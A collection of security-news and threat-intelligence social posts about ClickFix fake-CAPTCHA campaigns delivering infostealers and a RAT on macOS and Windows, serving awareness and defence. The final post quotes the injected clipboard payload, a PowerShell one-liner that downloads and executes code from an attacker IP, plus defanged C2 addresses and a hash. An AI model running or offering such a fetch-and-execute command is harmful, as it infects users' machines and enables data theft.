Punto Informatico: ClickFix: Microsoft scopre nuovi attacchi contro macOS

Microsoft ha descritto tre attacchi ClickFix che installano infostealer per macOS in grado di aggirare le protezioni e rubare numerosi dati sensibili.
The post ClickFix: Microsoft scopre nuovi attacchi contro macOS appeared first on Punto Informatico.

ClickFix: Microsoft discovers new attacks against macOS

Microsoft has described three ClickFix attacks that install infostealers for macOS, capable of bypassing protections and stealing numerous sensitive data.

#ClickFix #Microsoft

https://www.punto-informatico.it/clickfix-microsoft-scopre-nuovi-attacchi-contro-macos/

'ClickFix' attack tricks users into hacking themselves, ACSC warns:

"Verify that you are human" prompt used to deliver Vidar Stealer malware.

The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.

🤷 https://www.itnews.com.au/news/clickfix-attack-tricks-users-into-hacking-themselves-acsc-warns-625692

#clickfix #acsc #malware #vidar #stealing #VidarStealer #australia #socialengineering

Microsoft researchers warn of a new #ClickFix campaign targeting macOS with fake guides on Medium and Craft to deploy AMOS and SHub Stealer via Terminal commands.

Read: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/

#CyberSecurity #macOS ##AMOS #SHubStealer #Scam

#Australia warns of #ClickFix attacks pushing #VidarStealer #malware

https://www.bleepingcomputer.com/news/security/australia-warns-of-clickfix-attacks-pushing-vidar-stealer-malware/

#cybersecurity

Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]

Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...

#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika

https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/

ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/

#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence

2026-04-22: Malicious ad (#Malvertizing) for Claude leads to #ClickFix style page for #macOS #malware

Details at https://www.malware-traffic-analysis.net/2026/04/22/index.html

I've seen a bit about this activity from other sources, but this is the infection I generated in my lab and finally got around to posting.

2026-04-27 (Monday):

Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

#ClickFix script injected into clipboard:

powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

Traffic leading to #RAT payload:

- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/io

Zip archive with package for RAT payload:

- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

#RAT payload C2 traffic:

- tcp[:]//89.110.110[.]119:443/